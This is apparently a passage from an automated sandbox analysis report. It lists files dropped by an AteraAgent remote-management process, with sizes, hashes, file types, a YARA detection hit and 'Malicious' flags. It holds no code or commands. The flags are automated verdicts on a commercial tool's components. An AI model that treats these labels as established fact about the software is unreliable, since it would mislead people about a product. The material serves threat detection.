                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:92kKfq2RQuKDMOoytxL2L4zP+YuqL2zL7SAaDx4lbOw6OhkW76fJrk:OQmyxL2L4D+YZL2X7SAaqywjhkWerk
                                                                                                                                                                                                                                                                                              MD5:372842434C221E20896C8F46EDACA92C
                                                                                                                                                                                                                                                                                              SHA1:F58A0757262F84933744252A0B4FC1D38F15DB77
                                                                                                                                                                                                                                                                                              SHA-256:FA88BB99081003615E0BED4FA5AA167333DBE0B05A1A63B51FAA5DA7BFBE5663
                                                                                                                                                                                                                                                                                              SHA-512:A1A9A8B073F0323ED64D21A894BB93CC86157F3B8B576D1496854D26AC05334FA124E094F60E632C0F49B117B7DF0124AD2C5329A2E34F94D0A34333D0DB242A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):386600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.135937789568278
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:9sETsbZnV4Nsaw8MkaybNq0qJh1rDHq4so8maLvdGCBg/8Q/ZmvEyJ:9sbZnMfwWFKFrrWa8BvEyJ
                                                                                                                                                                                                                                                                                              MD5:32C2B12FDB90808935E6EAEBC0C5FD78
                                                                                                                                                                                                                                                                                              SHA1:A18B77B7BCC1D041407D7156601F3B5348656B02
                                                                                                                                                                                                                                                                                              SHA-256:35A59D6F04E98951767DE04524EB64B7CA726E205991CD0931527F455BF0F3F8
                                                                                                                                                                                                                                                                                              SHA-512:CEE29FA1F7F976A4DECAAB7C30FC4951D540A30DD2EB4515605BB62CF0ACE9E8712CF9FAAA4DFBF7B6B60EEE5A9A2C5CF1A46785322D15CA2BC8F528225C8004
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.83810396352101
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7N9VWhX3WseNyb8E9VF6IYijSJIVxF5WGJ:RGZmEpYi60h
                                                                                                                                                                                                                                                                                              MD5:E88A7FE06B461A6EA66D56E239910CC3
                                                                                                                                                                                                                                                                                              SHA1:7CE72B25B887DDAD309ED0C7EE2A504AD1913B9A
                                                                                                                                                                                                                                                                                              SHA-256:625D7259448DF2BAF8844310FB95415F00B8BAA4F8300CE2C43F90CA9AD523A8
                                                                                                                                                                                                                                                                                              SHA-512:BA607172615D676E9786C4E3E92316BFACFE2589D29F4AE95B1F2FD967663812520A40ABABAF7ACC844E4D01190B084460BC5BF82B9EF183DE3684CC433FA90F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1686260686243735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:VBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTn:VDMUWITZznu85k8Wdn8KmCjIFi3Vvb
                                                                                                                                                                                                                                                                                              MD5:84688C58A26961FB5CC64B9C07245201
                                                                                                                                                                                                                                                                                              SHA1:B823A565015EA4D6056FB776C2878DCFBD45F65C
                                                                                                                                                                                                                                                                                              SHA-256:2AFA0F82215A9821746C680EC3CF8358244EA71689A3074EC8BB1BEF7D39DD67
                                                                                                                                                                                                                                                                                              SHA-512:162AD6C55E9F3E7E7962885FE0AFD292C73DB9469354760BA0E949B9D8BA5E6657ADB7768D0432CDED9128D82293B3D1B8A933908D09FC07E95C7A6BAFE94ADC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071445078992113
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:E1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQS:E1n1p9LdRN39aQZUqD
                                                                                                                                                                                                                                                                                              MD5:B65642D5C268E5335B6D5BFFF0690DB0
                                                                                                                                                                                                                                                                                              SHA1:A58882087ED8377F88F9BAA6E448E64D214BD048
                                                                                                                                                                                                                                                                                              SHA-256:7A202887AC81D4C379102C5E66EC02AE6C58DEBDE9AB99D72B50263F83862B7B
                                                                                                                                                                                                                                                                                              SHA-512:8E7DA62E9D0E288DC9EFC9559A2640A0C05435D6A25F8023857256A4B4C9AED55593220A930ACB6D171E01D968F1B2CD9748191DE7E242707E1704D140980B03
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960272795417215
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:IBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUc:IBA/ZTvQD0XY0AJBSjRlXP36RMGB
                                                                                                                                                                                                                                                                                              MD5:154279B228E454EF4F2C00E6641C4156
                                                                                                                                                                                                                                                                                              SHA1:7ADC7DA40FAF7F84E5F7EFC1CEA2B1A782B6444F
                                                                                                                                                                                                                                                                                              SHA-256:24FA79B003DC41A0C8BB5B093C84767747BF92679559B329A5F97CB1BFB7E9ED
                                                                                                                                                                                                                                                                                              SHA-512:9D521972D56F47824D35E47BEB3A1AF8961CFD55E1C4CE07053BAC373CF80A980C5415D0E5CEAEBF71EBBBC087D76E633286094516CDD4B2F987CEAE00DB37D2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285736
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.184607903346133
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:vZAWDkTmokB1QI3A5XeedC1OcQykFlE1WhOMiSdNrgClZ73HpsP+zvz:vZU0BJwuOcrl1w7HX3HW2
                                                                                                                                                                                                                                                                                              MD5:57A1AEE6DE2FA4131930B08624B644D8
                                                                                                                                                                                                                                                                                              SHA1:8823A7D95F04C5E09F00858EEC8E79FBDF19FFD8
                                                                                                                                                                                                                                                                                              SHA-256:C4146ACBDFAF502E9D48817D75C3E55C34DD2FD809B1256C25E151F431D09650
                                                                                                                                                                                                                                                                                              SHA-512:476E308A37B7EE55380B5C70A1CF5E4F9269E5D29C2987CE2B67060069D256E2797DB21185F1A1688284EF455764278E9C27CB11CDBB9A6AAB4A81822EDA05C9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.561297207852954
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yAQk7qYbA6fXDpLk5LHAxOEaGxBtNXNyb8E9VF6IYijSJIVxsfJH:R1LOg3BtNbEpYi602H
                                                                                                                                                                                                                                                                                              MD5:972828A8463F21F9D3C52893BEA77D25
                                                                                                                                                                                                                                                                                              SHA1:135C36153186F2BE11B7EE4F7122310000B3EB71
                                                                                                                                                                                                                                                                                              SHA-256:7D39C2DA637722ECB4D54846B0378D7BCFF82378A5C3FE1C699977AF7F8E368D
                                                                                                                                                                                                                                                                                              SHA-512:B99D577447B031F45BD876B1A26E4B72503359EC743FE4A9A28CF2014E24D3AFE542F7FA961D22B184E5758AFE66A17A7ED1FF738FB8F24A4283DA5C2C2F72D1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.997010915207503
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3Aruz7h+1/gF27RgdSagFsg+w3jdgDSg+CagFt:wruv4Mw9y
                                                                                                                                                                                                                                                                                              MD5:A1DB8C019769BA7256F40E580304C782
                                                                                                                                                                                                                                                                                              SHA1:6C0D70EE9CEBFC288A88B100F59D5554F8C42A35
                                                                                                                                                                                                                                                                                              SHA-256:FC68DEF71CD783C53B3D106317F879E544E3443A55AF195BDD6C663F8051A96F
                                                                                                                                                                                                                                                                                              SHA-512:795C141D06E70CD0D91ACFFE74F519EDB78382588B10927D456D20AA70D10BADCF02A626B8B666B00B21CAFCD555F03029D16EFAABCF1D762D58AA8095B6527D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):210984
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.348173320507078
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:rsMNkrE4AOS3ncIzkq2ijc3Y28MNwH5Z54a7v:wMNkrE4AOqcIzQijLt
                                                                                                                                                                                                                                                                                              MD5:9098FDEBF06AD4F86DBC6567B8F0E889
                                                                                                                                                                                                                                                                                              SHA1:6B38B07BDB90F452591D4679BFE5CC436E048E48
                                                                                                                                                                                                                                                                                              SHA-256:D85301799C1080DD41E88CB37FC4D27465E2AD888ED527EB28BB2A2A2EB8E03D
                                                                                                                                                                                                                                                                                              SHA-512:E7F54A26E75FF693C2484B78571BFB95F95E6802BB37E4AAB622C4CA095C247A9A729AB025784078C29ECA58C23FDD01D9BDF0DA166A096B11D0E6CD7DB4CC7C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19433
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9963400212242055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:hrg4CdkumUwfGReGWeGFuGgeKCUDuTeHOTu0U5e3eTOaUmS0SXStuKhubUfSJeZY:hrPOPUDCTHffIz
                                                                                                                                                                                                                                                                                              MD5:78AE9CC6C7B11BAC2B18E82FC7623CDB
                                                                                                                                                                                                                                                                                              SHA1:8314E6F35448B820C7C703FC3E4DE598D2A51AEC
                                                                                                                                                                                                                                                                                              SHA-256:D3841AA3440CDA26776DDE128157294E69A70B21344D5877D640C457353C2DCB
                                                                                                                                                                                                                                                                                              SHA-512:CE6A750E75090487C47095B80D47F5AD0C3D3DE4D6EC58A01E14CC694600FEF951AE371DD2A1B82C756ADD66825611B13240DDD3AAE6339ED85DBD3392DED7E5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Numerics.Vectors" pub
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.116902682924283
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:3ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH+:pgo0WPVTXge
                                                                                                                                                                                                                                                                                              MD5:988C9D7CB794FB98A0F00B1CAC123D30
                                                                                                                                                                                                                                                                                              SHA1:731A6D91362D0B4245FDD328B17E6F505E48EF80
                                                                                                                                                                                                                                                                                              SHA-256:1F3ED7348B7C41CFFDB9A062C9B654931ED590C77EB4836BCD77A7C64B0AC39E
                                                                                                                                                                                                                                                                                              SHA-512:AF6DE7DC4C78C8C2055BDC99FE9C650E5C44470F0913C3B8D495B7846F63BAD0328918E73C04A542DE4E67C800FCD83925F11C3D174C8C8E1F07D27497AA95E3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8059658320981615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:WDNxWQFWsoNyb8E9VF6IYijSJIVx5+ssR:WDNVLAEpYi602R
                                                                                                                                                                                                                                                                                              MD5:C2064A5B14C1F424718709B04DAF0FB0
                                                                                                                                                                                                                                                                                              SHA1:326FD58B738A32D9DCA68012F5A6DC1750239365
                                                                                                                                                                                                                                                                                              SHA-256:A14785B5EB132463A789C8F8BAFC61743A8E7455EDCFC2D4575DA21E418D60E4
                                                                                                                                                                                                                                                                                              SHA-512:4BD4E5C38F542AE41E4FE2A0FAEA69D8B37096BC523911D2263BE861CBE4A64B9EDE87DD8B3D17DD6B25A57A05038C241171784DD63EF4EA1495B1FBF17B3ECE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6706281590582215
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAyiI:vrMcXP64LEpYi608I
                                                                                                                                                                                                                                                                                              MD5:9FC668EE53969623508CCF6611FD57F4
                                                                                                                                                                                                                                                                                              SHA1:81F19A067020D8B9CC0F9FEBCBC50D94B9630C88
                                                                                                                                                                                                                                                                                              SHA-256:E9880A6D15335C034660442B04F89ED53E1BCF0188B059DEC110A4152F4EF413
                                                                                                                                                                                                                                                                                              SHA-512:41E3C071BED8B32444EE2D55513E91839A6076E2CFE534033290DFBD4E0442CBD985EEB7B15ED4400DA4686514EF45C2B8FC39E690DD3B79D44F1BED24B0AD2A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.907673358776868
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vm2igOWnW8rW/tNyb8E9VF6IYijSJIVxPT89xNgl:XtaJEpYi60w9I
                                                                                                                                                                                                                                                                                              MD5:B1530AF38169AB17993803DCBBC97C15
                                                                                                                                                                                                                                                                                              SHA1:0C4D4B813EB48CAF441C0987583D8E2B4A8E6FC2
                                                                                                                                                                                                                                                                                              SHA-256:79F518D394DCB75B424F364C2DBCB7E114B51DA4C0DE8BAA6CC5559FF781A152
                                                                                                                                                                                                                                                                                              SHA-512:F8A9E3C2BC50CABA0E7BFB2AC747D8DBBAB7A82E361C85212148048E5FD66C4107323943E753090BFDDF7267A7B53390DD61FF954868CA664EB6933F5D7B41E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8985842585077926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nnapn1iwwPWcGWT5JNyb8E9VF6IYijSJIVxagmKEFYm:aDur5NEpYi600T3
                                                                                                                                                                                                                                                                                              MD5:0763A802D1B4B276635E612F35E23FE8
                                                                                                                                                                                                                                                                                              SHA1:3C256531D21E35595E3699DBFFD9C9C50CC9098A
                                                                                                                                                                                                                                                                                              SHA-256:C17C283DE1A8ED8FA5438DCB8126EB91511E2C49D0706DA50813E23466679DF8
                                                                                                                                                                                                                                                                                              SHA-512:87666AE8FDC33F07C696B0C0057347376E5EC47AEE0F7FC5EC0070F5846194E9BCC1BF624872C11C4ECFC9F2F7A10E5CD3EFC9591948D5DC41CA43AC5DAFEB16
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.905536792862369
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:qHLaEav5aaUa6arWVLWrMNyb8E9VF6IYijSJIVxg3gDHvA:bPv5t/NOOMEpYi608cPA
                                                                                                                                                                                                                                                                                              MD5:847AC54FBB84C86BB024795BAE96C693
                                                                                                                                                                                                                                                                                              SHA1:D2124E516D2D01B3B840800A15B2B6E2F2DA972B
                                                                                                                                                                                                                                                                                              SHA-256:4B45720B96ECCD3B3F812ED05E4835A5EAFC3FBFD6505D0E7098864F8B4E44BB
                                                                                                                                                                                                                                                                                              SHA-512:A22494D45CABBC91C732D35EA3CFCAB7207AA62F2FDD872E5BEF252F0CE67E1D9524747E420BB09A10262607F305C734F89D7806839D99D1048367323C54F715
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.75992303278916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:06iIJq56dOuWSKeWukNyb8E9VF6IYijSJIVxHDRxQxd:GiAuEEpYi609mH
                                                                                                                                                                                                                                                                                              MD5:435008FCDC6949D74403F8937A9DDED0
                                                                                                                                                                                                                                                                                              SHA1:4E9C38420DB7C87C58AEC9271E8A0A968F47AA96
                                                                                                                                                                                                                                                                                              SHA-256:A4A1EA474185E9D56EFCAB64E6A34FFD563CC028A91BB1FE85BFD97773F1FC92
                                                                                                                                                                                                                                                                                              SHA-512:81A7D83D7484BB1B38F9B2164AD42D0D31346626653F9503977942C43F49C7F43227718B50A552AB8D26FA410D08EC8E034B4F71466916B51BC14F1743B38379
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15912
Entropy (8bit):6.8111682906136926
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15912
Entropy (8bit):6.859379458293653
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):16936
Entropy (8bit):6.785283839401024
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.849856881849517
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.848390763178357
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):148520
Entropy (8bit):5.418180901091705
Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:1dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+CSE:j+2jv1x0ebezWiu8
                                                                                                                                                                                                                                                                                              MD5:F204707F338F6C7819482922C0958D10
                                                                                                                                                                                                                                                                                              SHA1:4EC0D04FD7E2B8834A6AE96A2380F97965562E1A
                                                                                                                                                                                                                                                                                              SHA-256:1379BE52E32EAD9795E1F3270B91A29119B59BC7DF16F3B9BD1A0E00954FC10D
                                                                                                                                                                                                                                                                                              SHA-512:68888BA7746EAAAEC6C0AD64B5A8B0EC27547E0A40B98A34109ABA051BEE07082C5359D9E22078E4D0D01B7F09C1075A0F21CC749A465EACC58BD90338FD5297
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.810928431259459
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:XRtRWjYWw9Nyb8E9VF6IYijSJIVxIRMki:nie5EpYi60z
                                                                                                                                                                                                                                                                                              MD5:3C52E43E526A4DDEA7E21D3F6CB0934C
                                                                                                                                                                                                                                                                                              SHA1:48B0A29FC2CBB6E66414D44FE0D36E02A61B501B
                                                                                                                                                                                                                                                                                              SHA-256:12545A778E40FAC4A5842D56E9C5571B7BA370B2A04883A82C1C86C3979F78C3
                                                                                                                                                                                                                                                                                              SHA-512:7F0EBD61CE00268436845C4C513BE19E7311CFDDA5AD90CB6AF6F4274D865649C437240961415DADEB0178E5A26DB2F8B7F8943BAB5ABEDE833F3DCD86E166D6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.890844337955829
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:nFxrIFWnoW5BPrNyby2sE9jBF6IYiYF85S35IVnxGUHFK1+Jm5RmP:veWnoW7zNyb8E9VF6IYijSJIVxG1+MbU
                                                                                                                                                                                                                                                                                              MD5:039CC956B7A5891ECC3799D805EBF444
